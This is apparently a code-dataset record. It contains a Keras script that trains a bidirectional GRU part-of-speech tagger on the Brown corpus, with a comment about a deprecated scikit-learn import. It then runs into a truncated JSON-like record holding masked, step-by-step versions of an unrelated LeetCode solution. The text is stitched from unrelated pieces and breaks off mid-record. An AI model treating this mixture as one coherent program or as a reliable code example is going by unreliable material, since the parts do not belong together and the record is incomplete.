model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.Conv1D(128, 2, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 3, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 4, padding='same', activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256, activation='tanh')))
model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags), activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
model.summary()
model.compile('adam', 'categorical_crossentropy')
model.fit_generator(generate_batches(train_data), len(train_data) /
BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)
acc = compute_test_accuracy(model)
print("""
Final accuracy: %.5f""" % acc)
model.save_weights('LSTM_gpu_trained_weights_1layer.h5')
<|reserved_special_token_1|>
import sys
sys.path.append("..")
import helpers
helpers.mask_busy_gpus(wait=False)
import nltk
import numpy as np
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])
from sklearn.cross_validation import train_test_split
train_data,test_data = train_test_split(data,test_size=0.25,random_state=42)
from collections import Counter
word_counts = Counter()
for sentence in data:
words,tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])
#print(all_words)
#let's measure what fraction of data words are in the dictionary
print("Coverage = %.5f"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))
from collections import defaultdict
word_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})
tag_to_id = {tag:i for i,tag in enumerate(all_tags)}
def to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len,lines))
matrix = np.empty([len(lines),max_len],dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]
matrix[i,:len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print("Word ids:")
print(to_matrix(batch_words,word_to_id))
print("Tag ids:")
print(to_matrix(batch_tags,tag_to_id))
import keras
import keras.layers as L
from keras.utils.np_utils import to_categorical
BATCH_SIZE=32
def generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):
assert isinstance(sentences,np.ndarray),"Make sure sentences is q numpy array"
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0,len(indices)-1,batch_size):
batch_indices = indices[start:start+batch_size]
batch_words,batch_tags = [],[]
for sent in sentences[batch_indices]:
words,tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words,word_to_id,max_len,pad)
batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)
batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))
yield batch_words,batch_tags_1hot
def compute_test_accuracy(model):
test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)
#predict tag probabilities of shape [batch,time,n_tags]
predicted_tag_probabilities = model.predict(test_words,verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
#compute accurary excluding padding
numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))
denominator = np.sum(test_words != 0)
return float(numerator)/denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self,epoch,logs=None):
sys.stdout.flush()
print("\nMeasuring validation accuracy...")
acc = compute_test_accuracy(self.model)
print("\nValidation accuracy: %.5f\n"%acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None],dtype='int32'))
model.add(L.Embedding(len(all_words),50))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
#
#
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.Conv1D(128,2,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,3,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,4,padding='same',activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
#model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags),activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
model.summary()
model.compile('adam','categorical_crossentropy')
model.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,
callbacks=[EvaluateAccuracy()], epochs=50,)
acc = compute_test_accuracy(model)
print("\nFinal accuracy: %.5f"%acc)
model.save_weights("LSTM_gpu_trained_weights_1layer.h5")
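
# --- Editor's note (not part of the original script). ---
# `sklearn.cross_validation` is the pre-0.18 module name; on current scikit-learn the
# equivalent import would be
#   from sklearn.model_selection import train_test_split
# and the rest of the pipeline (Counter vocabulary, to_matrix padding, the batch
# generator feeding fit_generator) is unaffected by that swap.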
|
flexible
|
{
"blob_id": "7f7ebc6d3d69fbb19071c63a9ab235ad01f1d414",
"index": 306,
"step-1": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\n<mask token>\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\n<mask token>\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\n<mask token>\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, 
return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\n<mask token>\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\n<mask token>\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-4": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',\n 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\ndata = np.array([[(word.lower(), tag) for word, tag in sentence] for\n sentence in data])\n<mask token>\ntrain_data, test_data = train_test_split(data, test_size=0.25, random_state=42)\n<mask token>\nword_counts = Counter()\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\nall_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(\n 10000)))[0])\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\nword_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(\n all_words)})\ntag_to_id = {tag: i for i, tag in enumerate(all_tags)}\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\nbatch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\nBATCH_SIZE = 32\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, 
activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nstepwise_dense = L.Dense(len(all_tags), activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\nacc = compute_test_accuracy(model)\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-5": "import sys\nsys.path.append(\"..\")\nimport helpers\nhelpers.mask_busy_gpus(wait=False)\n\n\n\nimport nltk\n\nimport numpy as np\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\n\ndata = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])\n\nfrom sklearn.cross_validation import train_test_split\ntrain_data,test_data = train_test_split(data,test_size=0.25,random_state=42)\n\nfrom collections import Counter\nword_counts = Counter()\nfor sentence in data:\n words,tags = zip(*sentence)\n \n word_counts.update(words)\n\nall_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])\n#print(all_words)\n#let's measure what fraction of data words are in the dictionary\nprint(\"Coverage = %.5f\"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))\n\nfrom collections import defaultdict\nword_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})\ntag_to_id = {tag:i for i,tag in enumerate(all_tags)}\n\ndef to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n \n max_len = max_len or max(map(len,lines))\n matrix = np.empty([len(lines),max_len],dtype)\n matrix.fill(pad)\n\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]\n matrix[i,:len(line_ix)] = line_ix\n\n return matrix.T if time_major else matrix\n\nbatch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\n\nprint(\"Word ids:\")\nprint(to_matrix(batch_words,word_to_id))\nprint(\"Tag ids:\")\nprint(to_matrix(batch_tags,tag_to_id))\n\nimport keras\nimport keras.layers as L\n\nfrom keras.utils.np_utils import to_categorical\nBATCH_SIZE=32\ndef generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):\n assert isinstance(sentences,np.ndarray),\"Make sure sentences is q numpy array\"\n \n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0,len(indices)-1,batch_size):\n batch_indices = indices[start:start+batch_size]\n batch_words,batch_tags = [],[]\n for sent in sentences[batch_indices]:\n words,tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n\n batch_words = to_matrix(batch_words,word_to_id,max_len,pad)\n batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)\n\n batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))\n yield batch_words,batch_tags_1hot\n \ndef compute_test_accuracy(model):\n test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)\n\n #predict tag probabilities of shape [batch,time,n_tags]\n predicted_tag_probabilities = model.predict(test_words,verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n\n #compute accurary excluding padding\n numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))\n denominator = np.sum(test_words != 0)\n return float(numerator)/denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n def on_epoch_end(self,epoch,logs=None):\n sys.stdout.flush()\n print(\"\\nMeasuring validation accuracy...\")\n acc = compute_test_accuracy(self.model)\n print(\"\\nValidation 
accuracy: %.5f\\n\"%acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\n\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None],dtype='int32'))\nmodel.add(L.Embedding(len(all_words),50))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#\n\n#\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.Conv1D(128,2,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,3,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,4,padding='same',activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\n#model.add(L.Dropout(0.25))\n\nstepwise_dense = L.Dense(len(all_tags),activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\n\nmodel.summary()\nmodel.compile('adam','categorical_crossentropy')\n\nmodel.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,\n callbacks=[EvaluateAccuracy()], epochs=50,)\n\n\nacc = compute_test_accuracy(model)\nprint(\"\\nFinal accuracy: %.5f\"%acc)\n\nmodel.save_weights(\"LSTM_gpu_trained_weights_1layer.h5\")\n",
"step-ids": [
4,
5,
6,
7,
9
]
}
|
[
4,
5,
6,
7,
9
] |
# https://leetcode.com/problems/how-many-numbers-are-smaller-than-the-current-number/
# BruteForce
class BruteForceSolution:
def smallerNumbersThanCurrent(self, nums):
answer = []
for num in nums:
counter = 0
for i in range(len(nums)):
if nums[i] < num:
counter += 1
answer.append(counter)
return answer
class Solution:
def smallerNumbersThanCurrent(self, nums):
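        # in a sorted copy, the index of a value's first occurrence equals the count of strictly smaller numbers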
answer = []
sortedNums = sorted(nums)
for num in nums:
answer.append(sortedNums.index(num))
return answer
example = BruteForceSolution()
exampleTwo = Solution()
print(example.smallerNumbersThanCurrent([8,1,2,2,3]))
print(exampleTwo.smallerNumbersThanCurrent([8,1,2,2,3]))
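# both calls print [4, 0, 1, 1, 3]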
|
normal
|
{
"blob_id": "58e023c3c453d1e190fdb5bc457358f42d1bd93f",
"index": 397,
"step-1": "class BruteForceSolution:\n <mask token>\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\n",
"step-2": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\n",
"step-3": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\n<mask token>\nprint(example.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\nprint(exampleTwo.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\n",
"step-4": "class BruteForceSolution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n for num in nums:\n counter = 0\n for i in range(len(nums)):\n if nums[i] < num:\n counter += 1\n answer.append(counter)\n return answer\n\n\nclass Solution:\n\n def smallerNumbersThanCurrent(self, nums):\n answer = []\n sortedNums = sorted(nums)\n for num in nums:\n answer.append(sortedNums.index(num))\n return answer\n\n\nexample = BruteForceSolution()\nexampleTwo = Solution()\nprint(example.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\nprint(exampleTwo.smallerNumbersThanCurrent([8, 1, 2, 2, 3]))\n",
